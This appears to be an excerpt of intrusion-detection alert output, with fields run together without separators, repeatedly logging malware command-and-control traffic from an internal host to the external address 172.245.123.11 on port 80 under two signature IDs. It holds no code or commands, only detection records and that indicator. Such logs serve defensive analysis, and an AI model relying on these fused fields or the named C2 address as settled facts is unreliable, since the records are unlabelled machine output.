                2025-01-07T11:02:26.935612+010020243131Malware Command and Control Activity Detected192.168.2.549821172.245.123.1180TCP
                2025-01-07T11:02:27.636276+010020243131Malware Command and Control Activity Detected192.168.2.549828172.245.123.1180TCP
                2025-01-07T11:02:28.470234+010020243131Malware Command and Control Activity Detected192.168.2.549834172.245.123.1180TCP
                2025-01-07T11:02:29.132407+010020243131Malware Command and Control Activity Detected192.168.2.549839172.245.123.1180TCP
                2025-01-07T11:02:29.819500+010020243131Malware Command and Control Activity Detected192.168.2.549843172.245.123.1180TCP
                2025-01-07T11:02:30.594718+010020243131Malware Command and Control Activity Detected192.168.2.549849172.245.123.1180TCP
                2025-01-07T11:02:31.270511+010020243131Malware Command and Control Activity Detected192.168.2.549854172.245.123.1180TCP
                2025-01-07T11:02:31.967447+010020243131Malware Command and Control Activity Detected192.168.2.549860172.245.123.1180TCP
                2025-01-07T11:02:32.650824+010020243131Malware Command and Control Activity Detected192.168.2.549865172.245.123.1180TCP
                2025-01-07T11:02:33.618441+010020243131Malware Command and Control Activity Detected192.168.2.549872172.245.123.1180TCP
                2025-01-07T11:02:34.281865+010020243131Malware Command and Control Activity Detected192.168.2.549877172.245.123.1180TCP
                2025-01-07T11:02:35.003595+010020243131Malware Command and Control Activity Detected192.168.2.549883172.245.123.1180TCP
                2025-01-07T11:02:35.669509+010020243131Malware Command and Control Activity Detected192.168.2.549889172.245.123.1180TCP
                2025-01-07T11:02:36.331257+010020243131Malware Command and Control Activity Detected192.168.2.549895172.245.123.1180TCP
                2025-01-07T11:02:36.981306+010020243131Malware Command and Control Activity Detected192.168.2.549901172.245.123.1180TCP
                2025-01-07T11:02:37.629932+010020243131Malware Command and Control Activity Detected192.168.2.549907172.245.123.1180TCP
                2025-01-07T11:02:38.440568+010020243131Malware Command and Control Activity Detected192.168.2.549912172.245.123.1180TCP
                2025-01-07T11:02:39.104350+010020243131Malware Command and Control Activity Detected192.168.2.549915172.245.123.1180TCP
                2025-01-07T11:02:39.771926+010020243131Malware Command and Control Activity Detected192.168.2.549920172.245.123.1180TCP
                2025-01-07T11:02:40.445565+010020243131Malware Command and Control Activity Detected192.168.2.549926172.245.123.1180TCP
                2025-01-07T11:02:41.134057+010020243131Malware Command and Control Activity Detected192.168.2.549932172.245.123.1180TCP
                2025-01-07T11:02:41.803713+010020243131Malware Command and Control Activity Detected192.168.2.549934172.245.123.1180TCP
                2025-01-07T11:02:42.460094+010020243131Malware Command and Control Activity Detected192.168.2.549940172.245.123.1180TCP
                2025-01-07T11:02:43.145887+010020243131Malware Command and Control Activity Detected192.168.2.549946172.245.123.1180TCP
                2025-01-07T11:02:43.852429+010020243131Malware Command and Control Activity Detected192.168.2.549952172.245.123.1180TCP
                2025-01-07T11:02:44.522317+010020243131Malware Command and Control Activity Detected192.168.2.549958172.245.123.1180TCP
                2025-01-07T11:02:45.350075+010020243131Malware Command and Control Activity Detected192.168.2.549964172.245.123.1180TCP
                2025-01-07T11:02:46.030026+010020243131Malware Command and Control Activity Detected192.168.2.549969172.245.123.1180TCP
                2025-01-07T11:02:46.699521+010020243131Malware Command and Control Activity Detected192.168.2.549971172.245.123.1180TCP
                2025-01-07T11:02:47.374652+010020243131Malware Command and Control Activity Detected192.168.2.549976172.245.123.1180TCP
                2025-01-07T11:02:48.292985+010020243131Malware Command and Control Activity Detected192.168.2.549982172.245.123.1180TCP
                2025-01-07T11:02:49.000377+010020243131Malware Command and Control Activity Detected192.168.2.549987172.245.123.1180TCP
                2025-01-07T11:02:49.647470+010020243131Malware Command and Control Activity Detected192.168.2.549994172.245.123.1180TCP
                2025-01-07T11:02:50.327734+010020243131Malware Command and Control Activity Detected192.168.2.550000172.245.123.1180TCP
                2025-01-07T11:02:51.066587+010020243131Malware Command and Control Activity Detected192.168.2.550006172.245.123.1180TCP
                2025-01-07T11:02:51.758580+010020243131Malware Command and Control Activity Detected192.168.2.550009172.245.123.1180TCP
                2025-01-07T11:02:52.460403+010020243131Malware Command and Control Activity Detected192.168.2.550015172.245.123.1180TCP
                2025-01-07T11:02:53.129836+010020243131Malware Command and Control Activity Detected192.168.2.550020172.245.123.1180TCP
                2025-01-07T11:02:53.777572+010020243131Malware Command and Control Activity Detected192.168.2.550026172.245.123.1180TCP
                2025-01-07T11:02:54.694689+010020243131Malware Command and Control Activity Detected192.168.2.550032172.245.123.1180TCP
                2025-01-07T11:02:55.670454+010020243131Malware Command and Control Activity Detected192.168.2.550038172.245.123.1180TCP
                2025-01-07T11:02:56.381416+010020243131Malware Command and Control Activity Detected192.168.2.550044172.245.123.1180TCP
                2025-01-07T11:02:57.059679+010020243131Malware Command and Control Activity Detected192.168.2.550050172.245.123.1180TCP
                2025-01-07T11:02:57.747009+010020243131Malware Command and Control Activity Detected192.168.2.550055172.245.123.1180TCP
                2025-01-07T11:02:58.413612+010020243131Malware Command and Control Activity Detected192.168.2.550061172.245.123.1180TCP
                2025-01-07T11:02:59.073831+010020243131Malware Command and Control Activity Detected192.168.2.550066172.245.123.1180TCP
                2025-01-07T11:02:59.743774+010020243131Malware Command and Control Activity Detected192.168.2.550067172.245.123.1180TCP
                2025-01-07T11:03:00.408178+010020243131Malware Command and Control Activity Detected192.168.2.550068172.245.123.1180TCP
                2025-01-07T11:03:01.053021+010020243131Malware Command and Control Activity Detected192.168.2.550069172.245.123.1180TCP
                2025-01-07T11:03:01.734889+010020243131Malware Command and Control Activity Detected192.168.2.550070172.245.123.1180TCP
                2025-01-07T11:03:02.402684+010020243131Malware Command and Control Activity Detected192.168.2.550071172.245.123.1180TCP
                2025-01-07T11:03:03.187911+010020243131Malware Command and Control Activity Detected192.168.2.550072172.245.123.1180TCP
                2025-01-07T11:03:03.861850+010020243131Malware Command and Control Activity Detected192.168.2.550073172.245.123.1180TCP
                2025-01-07T11:03:04.533061+010020243131Malware Command and Control Activity Detected192.168.2.550074172.245.123.1180TCP
                2025-01-07T11:03:05.175668+010020243131Malware Command and Control Activity Detected192.168.2.550075172.245.123.1180TCP
                2025-01-07T11:03:05.822128+010020243131Malware Command and Control Activity Detected192.168.2.550076172.245.123.1180TCP
                2025-01-07T11:03:06.488704+010020243131Malware Command and Control Activity Detected192.168.2.550077172.245.123.1180TCP
                2025-01-07T11:03:07.161033+010020243131Malware Command and Control Activity Detected192.168.2.550078172.245.123.1180TCP
                2025-01-07T11:03:07.986400+010020243131Malware Command and Control Activity Detected192.168.2.550079172.245.123.1180TCP
                2025-01-07T11:03:08.655207+010020243131Malware Command and Control Activity Detected192.168.2.550080172.245.123.1180TCP
                2025-01-07T11:03:09.305924+010020243131Malware Command and Control Activity Detected192.168.2.550081172.245.123.1180TCP
                2025-01-07T11:03:09.979695+010020243131Malware Command and Control Activity Detected192.168.2.550082172.245.123.1180TCP
                2025-01-07T11:03:10.638606+010020243131Malware Command and Control Activity Detected192.168.2.550083172.245.123.1180TCP
                2025-01-07T11:03:11.312133+010020243131Malware Command and Control Activity Detected192.168.2.550084172.245.123.1180TCP
                2025-01-07T11:03:11.962130+010020243131Malware Command and Control Activity Detected192.168.2.550085172.245.123.1180TCP
                2025-01-07T11:03:12.613769+010020243131Malware Command and Control Activity Detected192.168.2.550086172.245.123.1180TCP
                2025-01-07T11:03:13.254814+010020243131Malware Command and Control Activity Detected192.168.2.550087172.245.123.1180TCP
                2025-01-07T11:03:13.969827+010020243131Malware Command and Control Activity Detected192.168.2.550088172.245.123.1180TCP
                2025-01-07T11:03:14.623238+010020243131Malware Command and Control Activity Detected192.168.2.550089172.245.123.1180TCP
                2025-01-07T11:03:15.287763+010020243131Malware Command and Control Activity Detected192.168.2.550090172.245.123.1180TCP
                2025-01-07T11:03:16.006105+010020243131Malware Command and Control Activity Detected192.168.2.550091172.245.123.1180TCP
                2025-01-07T11:03:16.665049+010020243131Malware Command and Control Activity Detected192.168.2.550092172.245.123.1180TCP
                2025-01-07T11:03:17.417958+010020243131Malware Command and Control Activity Detected192.168.2.550093172.245.123.1180TCP
                2025-01-07T11:03:18.071243+010020243131Malware Command and Control Activity Detected192.168.2.550094172.245.123.1180TCP
                2025-01-07T11:03:18.730694+010020243131Malware Command and Control Activity Detected192.168.2.550095172.245.123.1180TCP
                2025-01-07T11:03:19.380183+010020243131Malware Command and Control Activity Detected192.168.2.550096172.245.123.1180TCP
                2025-01-07T11:03:20.048570+010020243131Malware Command and Control Activity Detected192.168.2.550097172.245.123.1180TCP
                2025-01-07T11:03:20.702835+010020243131Malware Command and Control Activity Detected192.168.2.550098172.245.123.1180TCP
                2025-01-07T11:03:21.357331+010020243131Malware Command and Control Activity Detected192.168.2.550099172.245.123.1180TCP
                2025-01-07T11:03:21.997605+010020243131Malware Command and Control Activity Detected192.168.2.550100172.245.123.1180TCP
                2025-01-07T11:03:23.056888+010020243131Malware Command and Control Activity Detected192.168.2.550101172.245.123.1180TCP
                2025-01-07T11:03:24.002235+010020243131Malware Command and Control Activity Detected192.168.2.550102172.245.123.1180TCP
                2025-01-07T11:03:24.672832+010020243131Malware Command and Control Activity Detected192.168.2.550103172.245.123.1180TCP
                2025-01-07T11:03:26.568049+010020243131Malware Command and Control Activity Detected192.168.2.550104172.245.123.1180TCP
                2025-01-07T11:03:27.233167+010020243131Malware Command and Control Activity Detected192.168.2.550105172.245.123.1180TCP
                2025-01-07T11:03:27.880660+010020243131Malware Command and Control Activity Detected192.168.2.550106172.245.123.1180TCP
                2025-01-07T11:03:28.538323+010020243131Malware Command and Control Activity Detected192.168.2.550107172.245.123.1180TCP
                2025-01-07T11:03:29.206821+010020243131Malware Command and Control Activity Detected192.168.2.550108172.245.123.1180TCP
                2025-01-07T11:03:29.874483+010020243131Malware Command and Control Activity Detected192.168.2.550109172.245.123.1180TCP
                2025-01-07T11:03:30.549629+010020243131Malware Command and Control Activity Detected192.168.2.550110172.245.123.1180TCP
                2025-01-07T11:03:31.244877+010020243131Malware Command and Control Activity Detected192.168.2.550111172.245.123.1180TCP
                2025-01-07T11:03:31.926789+010020243131Malware Command and Control Activity Detected192.168.2.550112172.245.123.1180TCP
                2025-01-07T11:03:32.585891+010020243131Malware Command and Control Activity Detected192.168.2.550113172.245.123.1180TCP
                2025-01-07T11:03:33.260609+010020243131Malware Command and Control Activity Detected192.168.2.550114172.245.123.1180TCP
                2025-01-07T11:03:34.641167+010020243131Malware Command and Control Activity Detected192.168.2.550115172.245.123.1180TCP
                2025-01-07T11:03:35.284896+010020243131Malware Command and Control Activity Detected192.168.2.550116172.245.123.1180TCP
                2025-01-07T11:03:35.968310+010020243131Malware Command and Control Activity Detected192.168.2.550117172.245.123.1180TCP
                2025-01-07T11:03:36.632563+010020243131Malware Command and Control Activity Detected192.168.2.550118172.245.123.1180TCP
                2025-01-07T11:03:37.297198+010020243131Malware Command and Control Activity Detected192.168.2.550119172.245.123.1180TCP
                2025-01-07T11:03:37.932170+010020243131Malware Command and Control Activity Detected192.168.2.550120172.245.123.1180TCP
                2025-01-07T11:03:38.582549+010020243131Malware Command and Control Activity Detected192.168.2.550121172.245.123.1180TCP
                2025-01-07T11:03:39.249186+010020243131Malware Command and Control Activity Detected192.168.2.550122172.245.123.1180TCP
                2025-01-07T11:03:39.917989+010020243131Malware Command and Control Activity Detected192.168.2.550123172.245.123.1180TCP
                2025-01-07T11:03:40.576758+010020243131Malware Command and Control Activity Detected192.168.2.550124172.245.123.1180TCP
                2025-01-07T11:03:41.226763+010020243131Malware Command and Control Activity Detected192.168.2.550125172.245.123.1180TCP
                2025-01-07T11:03:41.941183+010020243131Malware Command and Control Activity Detected192.168.2.550126172.245.123.1180TCP
                2025-01-07T11:03:42.582157+010020243131Malware Command and Control Activity Detected192.168.2.550127172.245.123.1180TCP
                2025-01-07T11:03:43.230772+010020243131Malware Command and Control Activity Detected192.168.2.550128172.245.123.1180TCP
                2025-01-07T11:03:43.883877+010020243131Malware Command and Control Activity Detected192.168.2.550129172.245.123.1180TCP
                2025-01-07T11:03:44.565510+010020243131Malware Command and Control Activity Detected192.168.2.550130172.245.123.1180TCP
                2025-01-07T11:03:45.213830+010020243131Malware Command and Control Activity Detected192.168.2.550131172.245.123.1180TCP
                2025-01-07T11:03:45.873777+010020243131Malware Command and Control Activity Detected192.168.2.550132172.245.123.1180TCP
                2025-01-07T11:03:46.508415+010020243131Malware Command and Control Activity Detected192.168.2.550133172.245.123.1180TCP
                2025-01-07T11:03:47.253639+010020243131Malware Command and Control Activity Detected192.168.2.550134172.245.123.1180TCP
                2025-01-07T11:03:47.940009+010020243131Malware Command and Control Activity Detected192.168.2.550135172.245.123.1180TCP
                2025-01-07T11:03:48.599995+010020243131Malware Command and Control Activity Detected192.168.2.550136172.245.123.1180TCP
                2025-01-07T11:03:49.272186+010020243131Malware Command and Control Activity Detected192.168.2.550137172.245.123.1180TCP
                2025-01-07T11:03:49.952988+010020243131Malware Command and Control Activity Detected192.168.2.550138172.245.123.1180TCP
                2025-01-07T11:03:50.591200+010020243131Malware Command and Control Activity Detected192.168.2.550139172.245.123.1180TCP
                2025-01-07T11:03:51.248033+010020243131Malware Command and Control Activity Detected192.168.2.550140172.245.123.1180TCP
                2025-01-07T11:03:51.922208+010020243131Malware Command and Control Activity Detected192.168.2.550141172.245.123.1180TCP
                2025-01-07T11:03:52.591519+010020243131Malware Command and Control Activity Detected192.168.2.550142172.245.123.1180TCP
                2025-01-07T11:03:53.254331+010020243131Malware Command and Control Activity Detected192.168.2.550143172.245.123.1180TCP
                2025-01-07T11:03:53.917456+010020243131Malware Command and Control Activity Detected192.168.2.550144172.245.123.1180TCP
                2025-01-07T11:03:54.583211+010020243131Malware Command and Control Activity Detected192.168.2.550145172.245.123.1180TCP
                2025-01-07T11:03:55.236735+010020243131Malware Command and Control Activity Detected192.168.2.550146172.245.123.1180TCP
                2025-01-07T11:03:55.875902+010020243131Malware Command and Control Activity Detected192.168.2.550147172.245.123.1180TCP
                2025-01-07T11:03:56.528237+010020243131Malware Command and Control Activity Detected192.168.2.550148172.245.123.1180TCP
                2025-01-07T11:03:57.196556+010020243131Malware Command and Control Activity Detected192.168.2.550149172.245.123.1180TCP
                2025-01-07T11:03:57.860803+010020243131Malware Command and Control Activity Detected192.168.2.550150172.245.123.1180TCP
                2025-01-07T11:03:58.560538+010020243131Malware Command and Control Activity Detected192.168.2.550151172.245.123.1180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:58.458090+010020243181Malware Command and Control Activity Detected192.168.2.549706172.245.123.1180TCP
                2025-01-07T11:01:59.167458+010020243181Malware Command and Control Activity Detected192.168.2.549708172.245.123.1180TCP
                2025-01-07T11:01:59.826437+010020243181Malware Command and Control Activity Detected192.168.2.549709172.245.123.1180TCP
                2025-01-07T11:02:00.489975+010020243181Malware Command and Control Activity Detected192.168.2.549710172.245.123.1180TCP
                2025-01-07T11:02:01.182301+010020243181Malware Command and Control Activity Detected192.168.2.549711172.245.123.1180TCP
                2025-01-07T11:02:01.907867+010020243181Malware Command and Control Activity Detected192.168.2.549712172.245.123.1180TCP
                2025-01-07T11:02:02.634049+010020243181Malware Command and Control Activity Detected192.168.2.549714172.245.123.1180TCP
                2025-01-07T11:02:03.321041+010020243181Malware Command and Control Activity Detected192.168.2.549715172.245.123.1180TCP
                2025-01-07T11:02:04.082310+010020243181Malware Command and Control Activity Detected192.168.2.549716172.245.123.1180TCP
                2025-01-07T11:02:04.772127+010020243181Malware Command and Control Activity Detected192.168.2.549717172.245.123.1180TCP
                2025-01-07T11:02:05.483094+010020243181Malware Command and Control Activity Detected192.168.2.549718172.245.123.1180TCP
                2025-01-07T11:02:06.191450+010020243181Malware Command and Control Activity Detected192.168.2.549719172.245.123.1180TCP
                2025-01-07T11:02:06.944182+010020243181Malware Command and Control Activity Detected192.168.2.549720172.245.123.1180TCP
                2025-01-07T11:02:07.693898+010020243181Malware Command and Control Activity Detected192.168.2.549721172.245.123.1180TCP
                2025-01-07T11:02:08.371774+010020243181Malware Command and Control Activity Detected192.168.2.549722172.245.123.1180TCP
                2025-01-07T11:02:09.043689+010020243181Malware Command and Control Activity Detected192.168.2.549723172.245.123.1180TCP
                2025-01-07T11:02:09.690323+010020243181Malware Command and Control Activity Detected192.168.2.549724172.245.123.1180TCP
                2025-01-07T11:02:10.371491+010020243181Malware Command and Control Activity Detected192.168.2.549725172.245.123.1180TCP
                2025-01-07T11:02:11.080195+010020243181Malware Command and Control Activity Detected192.168.2.549727172.245.123.1180TCP
                2025-01-07T11:02:11.739564+010020243181Malware Command and Control Activity Detected192.168.2.549730172.245.123.1180TCP
                2025-01-07T11:02:12.466482+010020243181Malware Command and Control Activity Detected192.168.2.549732172.245.123.1180TCP
                2025-01-07T11:02:13.113940+010020243181Malware Command and Control Activity Detected192.168.2.549734172.245.123.1180TCP
                2025-01-07T11:02:13.753938+010020243181Malware Command and Control Activity Detected192.168.2.549736172.245.123.1180TCP
                2025-01-07T11:02:14.420666+010020243181Malware Command and Control Activity Detected192.168.2.549738172.245.123.1180TCP
                2025-01-07T11:02:15.079219+010020243181Malware Command and Control Activity Detected192.168.2.549739172.245.123.1180TCP
                2025-01-07T11:02:15.751764+010020243181Malware Command and Control Activity Detected192.168.2.549740172.245.123.1180TCP
                2025-01-07T11:02:16.407319+010020243181Malware Command and Control Activity Detected192.168.2.549741172.245.123.1180TCP
                2025-01-07T11:02:17.070038+010020243181Malware Command and Control Activity Detected192.168.2.549742172.245.123.1180TCP
                2025-01-07T11:02:17.794738+010020243181Malware Command and Control Activity Detected192.168.2.549748172.245.123.1180TCP
                2025-01-07T11:02:18.478664+010020243181Malware Command and Control Activity Detected192.168.2.549754172.245.123.1180TCP
                2025-01-07T11:02:19.157102+010020243181Malware Command and Control Activity Detected192.168.2.549760172.245.123.1180TCP
                2025-01-07T11:02:19.851955+010020243181Malware Command and Control Activity Detected192.168.2.549766172.245.123.1180TCP
                2025-01-07T11:02:20.564861+010020243181Malware Command and Control Activity Detected192.168.2.549772172.245.123.1180TCP
                2025-01-07T11:02:21.267286+010020243181Malware Command and Control Activity Detected192.168.2.549778172.245.123.1180TCP
                2025-01-07T11:02:21.949590+010020243181Malware Command and Control Activity Detected192.168.2.549784172.245.123.1180TCP
                2025-01-07T11:02:22.615903+010020243181Malware Command and Control Activity Detected192.168.2.549790172.245.123.1180TCP
                2025-01-07T11:02:23.331353+010020243181Malware Command and Control Activity Detected192.168.2.549795172.245.123.1180TCP
                2025-01-07T11:02:24.058134+010020243181Malware Command and Control Activity Detected192.168.2.549801172.245.123.1180TCP
                2025-01-07T11:02:24.758689+010020243181Malware Command and Control Activity Detected192.168.2.549804172.245.123.1180TCP
                2025-01-07T11:02:25.495647+010020243181Malware Command and Control Activity Detected192.168.2.549810172.245.123.1180TCP
                2025-01-07T11:02:26.182014+010020243181Malware Command and Control Activity Detected192.168.2.549815172.245.123.1180TCP
                2025-01-07T11:02:26.935612+010020243181Malware Command and Control Activity Detected192.168.2.549821172.245.123.1180TCP
                2025-01-07T11:02:27.636276+010020243181Malware Command and Control Activity Detected192.168.2.549828172.245.123.1180TCP
                2025-01-07T11:02:28.470234+010020243181Malware Command and Control Activity Detected192.168.2.549834172.245.123.1180TCP
                2025-01-07T11:02:29.132407+010020243181Malware Command and Control Activity Detected192.168.2.549839172.245.123.1180TCP
                2025-01-07T11:02:29.819500+010020243181Malware Command and Control Activity Detected192.168.2.549843172.245.123.1180TCP
                2025-01-07T11:02:30.594718+010020243181Malware Command and Control Activity Detected192.168.2.549849172.245.123.1180TCP
                2025-01-07T11:02:31.270511+010020243181Malware Command and Control Activity Detected192.168.2.549854172.245.123.1180TCP
                2025-01-07T11:02:31.967447+010020243181Malware Command and Control Activity Detected192.168.2.549860172.245.123.1180TCP
                2025-01-07T11:02:32.650824+010020243181Malware Command and Control Activity Detected192.168.2.549865172.245.123.1180TCP
                2025-01-07T11:02:33.618441+010020243181Malware Command and Control Activity Detected192.168.2.549872172.245.123.1180TCP
                2025-01-07T11:02:34.281865+010020243181Malware Command and Control Activity Detected192.168.2.549877172.245.123.1180TCP
                2025-01-07T11:02:35.003595+010020243181Malware Command and Control Activity Detected192.168.2.549883172.245.123.1180TCP
                2025-01-07T11:02:35.669509+010020243181Malware Command and Control Activity Detected192.168.2.549889172.245.123.1180TCP
                2025-01-07T11:02:36.331257+010020243181Malware Command and Control Activity Detected192.168.2.549895172.245.123.1180TCP
                2025-01-07T11:02:36.981306+010020243181Malware Command and Control Activity Detected192.168.2.549901172.245.123.1180TCP
                2025-01-07T11:02:37.629932+010020243181Malware Command and Control Activity Detected192.168.2.549907172.245.123.1180TCP
                2025-01-07T11:02:38.440568+010020243181Malware Command and Control Activity Detected192.168.2.549912172.245.123.1180TCP
                2025-01-07T11:02:39.104350+010020243181Malware Command and Control Activity Detected192.168.2.549915172.245.123.1180TCP
                2025-01-07T11:02:39.771926+010020243181Malware Command and Control Activity Detected192.168.2.549920172.245.123.1180TCP
                2025-01-07T11:02:40.445565+010020243181Malware Command and Control Activity Detected192.168.2.549926172.245.123.1180TCP
                2025-01-07T11:02:41.134057+010020243181Malware Command and Control Activity Detected192.168.2.549932172.245.123.1180TCP
                2025-01-07T11:02:41.803713+010020243181Malware Command and Control Activity Detected192.168.2.549934172.245.123.1180TCP
                2025-01-07T11:02:42.460094+010020243181Malware Command and Control Activity Detected192.168.2.549940172.245.123.1180TCP
                2025-01-07T11:02:43.145887+010020243181Malware Command and Control Activity Detected192.168.2.549946172.245.123.1180TCP
                2025-01-07T11:02:43.852429+010020243181Malware Command and Control Activity Detected192.168.2.549952172.245.123.1180TCP
                2025-01-07T11:02:44.522317+010020243181Malware Command and Control Activity Detected192.168.2.549958172.245.123.1180TCP
                2025-01-07T11:02:45.350075+010020243181Malware Command and Control Activity Detected192.168.2.549964172.245.123.1180TCP
                2025-01-07T11:02:46.030026+010020243181Malware Command and Control Activity Detected192.168.2.549969172.245.123.1180TCP
                2025-01-07T11:02:46.699521+010020243181Malware Command and Control Activity Detected192.168.2.549971172.245.123.1180TCP
                2025-01-07T11:02:47.374652+010020243181Malware Command and Control Activity Detected192.168.2.549976172.245.123.1180TCP
                2025-01-07T11:02:48.292985+010020243181Malware Command and Control Activity Detected192.168.2.549982172.245.123.1180TCP
                2025-01-07T11:02:49.000377+010020243181Malware Command and Control Activity Detected192.168.2.549987172.245.123.1180TCP
                2025-01-07T11:02:49.647470+010020243181Malware Command and Control Activity Detected192.168.2.549994172.245.123.1180TCP
                2025-01-07T11:02:50.327734+010020243181Malware Command and Control Activity Detected192.168.2.550000172.245.123.1180TCP
                2025-01-07T11:02:51.066587+010020243181Malware Command and Control Activity Detected192.168.2.550006172.245.123.1180TCP
                2025-01-07T11:02:51.758580+010020243181Malware Command and Control Activity Detected192.168.2.550009172.245.123.1180TCP
                2025-01-07T11:02:52.460403+010020243181Malware Command and Control Activity Detected192.168.2.550015172.245.123.1180TCP
                2025-01-07T11:02:53.129836+010020243181Malware Command and Control Activity Detected192.168.2.550020172.245.123.1180TCP
                2025-01-07T11:02:53.777572+010020243181Malware Command and Control Activity Detected192.168.2.550026172.245.123.1180TCP
                2025-01-07T11:02:54.694689+010020243181Malware Command and Control Activity Detected192.168.2.550032172.245.123.1180TCP
                2025-01-07T11:02:55.670454+010020243181Malware Command and Control Activity Detected192.168.2.550038172.245.123.1180TCP
                2025-01-07T11:02:56.381416+010020243181Malware Command and Control Activity Detected192.168.2.550044172.245.123.1180TCP
                2025-01-07T11:02:57.059679+010020243181Malware Command and Control Activity Detected192.168.2.550050172.245.123.1180TCP
                2025-01-07T11:02:57.747009+010020243181Malware Command and Control Activity Detected192.168.2.550055172.245.123.1180TCP
                2025-01-07T11:02:58.413612+010020243181Malware Command and Control Activity Detected192.168.2.550061172.245.123.1180TCP
                2025-01-07T11:02:59.073831+010020243181Malware Command and Control Activity Detected192.168.2.550066172.245.123.1180TCP
                2025-01-07T11:02:59.743774+010020243181Malware Command and Control Activity Detected192.168.2.550067172.245.123.1180TCP
                2025-01-07T11:03:00.408178+010020243181Malware Command and Control Activity Detected192.168.2.550068172.245.123.1180TCP
                2025-01-07T11:03:01.053021+010020243181Malware Command and Control Activity Detected192.168.2.550069172.245.123.1180TCP
                2025-01-07T11:03:01.734889+010020243181Malware Command and Control Activity Detected192.168.2.550070172.245.123.1180TCP
                2025-01-07T11:03:02.402684+010020243181Malware Command and Control Activity Detected192.168.2.550071172.245.123.1180TCP
                2025-01-07T11:03:03.187911+010020243181Malware Command and Control Activity Detected192.168.2.550072172.245.123.1180TCP
                2025-01-07T11:03:03.861850+010020243181Malware Command and Control Activity Detected192.168.2.550073172.245.123.1180TCP
                2025-01-07T11:03:04.533061+010020243181Malware Command and Control Activity Detected192.168.2.550074172.245.123.1180TCP
                2025-01-07T11:03:05.175668+010020243181Malware Command and Control Activity Detected192.168.2.550075172.245.123.1180TCP
                2025-01-07T11:03:05.822128+010020243181Malware Command and Control Activity Detected192.168.2.550076172.245.123.1180TCP
                2025-01-07T11:03:06.488704+010020243181Malware Command and Control Activity Detected192.168.2.550077172.245.123.1180TCP
                2025-01-07T11:03:07.161033+010020243181Malware Command and Control Activity Detected192.168.2.550078172.245.123.1180TCP
                2025-01-07T11:03:07.986400+010020243181Malware Command and Control Activity Detected192.168.2.550079172.245.123.1180TCP
                2025-01-07T11:03:08.655207+010020243181Malware Command and Control Activity Detected192.168.2.550080172.245.123.1180TCP
                2025-01-07T11:03:09.305924+010020243181Malware Command and Control Activity Detected192.168.2.550081172.245.123.1180TCP
                2025-01-07T11:03:09.979695+010020243181Malware Command and Control Activity Detected192.168.2.550082172.245.123.1180TCP
                2025-01-07T11:03:10.638606+010020243181Malware Command and Control Activity Detected192.168.2.550083172.245.123.1180TCP
                2025-01-07T11:03:11.312133+010020243181Malware Command and Control Activity Detected192.168.2.550084172.245.123.1180TCP
                2025-01-07T11:03:11.962130+010020243181Malware Command and Control Activity Detected192.168.2.550085172.245.123.1180TCP
                2025-01-07T11:03:12.613769+010020243181Malware Command and Control Activity Detected192.168.2.550086172.245.123.1180TCP
                2025-01-07T11:03:13.254814+010020243181Malware Command and Control Activity Detected192.168.2.550087172.245.123.1180TCP
                2025-01-07T11:03:13.969827+010020243181Malware Command and Control Activity Detected192.168.2.550088172.245.123.1180TCP
                2025-01-07T11:03:14.623238+010020243181Malware Command and Control Activity Detected192.168.2.550089172.245.123.1180TCP
                2025-01-07T11:03:15.287763+010020243181Malware Command and Control Activity Detected192.168.2.550090172.245.123.1180TCP
                2025-01-07T11:03:16.006105+010020243181Malware Command and Control Activity Detected192.168.2.550091172.245.123.1180TCP
                2025-01-07T11:03:16.665049+010020243181Malware Command and Control Activity Detected192.168.2.550092172.245.123.1180TCP
                2025-01-07T11:03:17.417958+010020243181Malware Command and Control Activity Detected192.168.2.550093172.245.123.1180TCP
                2025-01-07T11:03:18.071243+010020243181Malware Command and Control Activity Detected192.168.2.550094172.245.123.1180TCP
                2025-01-07T11:03:18.730694+010020243181Malware Command and Control Activity Detected192.168.2.550095172.245.123.1180TCP
                2025-01-07T11:03:19.380183+010020243181Malware Command and Control Activity Detected192.168.2.550096172.245.123.1180TCP
                2025-01-07T11:03:20.048570+010020243181Malware Command and Control Activity Detected192.168.2.550097172.245.123.1180TCP
                2025-01-07T11:03:20.702835+010020243181Malware Command and Control Activity Detected192.168.2.550098172.245.123.1180TCP
                2025-01-07T11:03:21.357331+010020243181Malware Command and Control Activity Detected192.168.2.550099172.245.123.1180TCP
                2025-01-07T11:03:21.997605+010020243181Malware Command and Control Activity Detected192.168.2.550100172.245.123.1180TCP
                2025-01-07T11:03:23.056888+010020243181Malware Command and Control Activity Detected192.168.2.550101172.245.123.1180TCP
                2025-01-07T11:03:24.002235+010020243181Malware Command and Control Activity Detected192.168.2.550102172.245.123.1180TCP
                2025-01-07T11:03:24.672832+010020243181Malware Command and Control Activity Detected192.168.2.550103172.245.123.1180TCP
                2025-01-07T11:03:26.568049+010020243181Malware Command and Control Activity Detected192.168.2.550104172.245.123.1180TCP
                2025-01-07T11:03:27.233167+010020243181Malware Command and Control Activity Detected192.168.2.550105172.245.123.1180TCP
                2025-01-07T11:03:27.880660+010020243181Malware Command and Control Activity Detected192.168.2.550106172.245.123.1180TCP
                2025-01-07T11:03:28.538323+010020243181Malware Command and Control Activity Detected192.168.2.550107172.245.123.1180TCP
                2025-01-07T11:03:29.206821+010020243181Malware Command and Control Activity Detected192.168.2.550108172.245.123.1180TCP
                2025-01-07T11:03:29.874483+010020243181Malware Command and Control Activity Detected192.168.2.550109172.245.123.1180TCP
                2025-01-07T11:03:30.549629+010020243181Malware Command and Control Activity Detected192.168.2.550110172.245.123.1180TCP
                2025-01-07T11:03:31.244877+010020243181Malware Command and Control Activity Detected192.168.2.550111172.245.123.1180TCP
                2025-01-07T11:03:31.926789+010020243181Malware Command and Control Activity Detected192.168.2.550112172.245.123.1180TCP
                2025-01-07T11:03:32.585891+010020243181Malware Command and Control Activity Detected192.168.2.550113172.245.123.1180TCP
                2025-01-07T11:03:33.260609+010020243181Malware Command and Control Activity Detected192.168.2.550114172.245.123.1180TCP
                2025-01-07T11:03:34.641167+010020243181Malware Command and Control Activity Detected192.168.2.550115172.245.123.1180TCP
                2025-01-07T11:03:35.284896+010020243181Malware Command and Control Activity Detected192.168.2.550116172.245.123.1180TCP
                2025-01-07T11:03:35.968310+010020243181Malware Command and Control Activity Detected192.168.2.550117172.245.123.1180TCP
                2025-01-07T11:03:36.632563+010020243181Malware Command and Control Activity Detected192.168.2.550118172.245.123.1180TCP
                2025-01-07T11:03:37.297198+010020243181Malware Command and Control Activity Detected192.168.2.550119172.245.123.1180TCP
                2025-01-07T11:03:37.932170+010020243181Malware Command and Control Activity Detected192.168.2.550120172.245.123.1180TCP
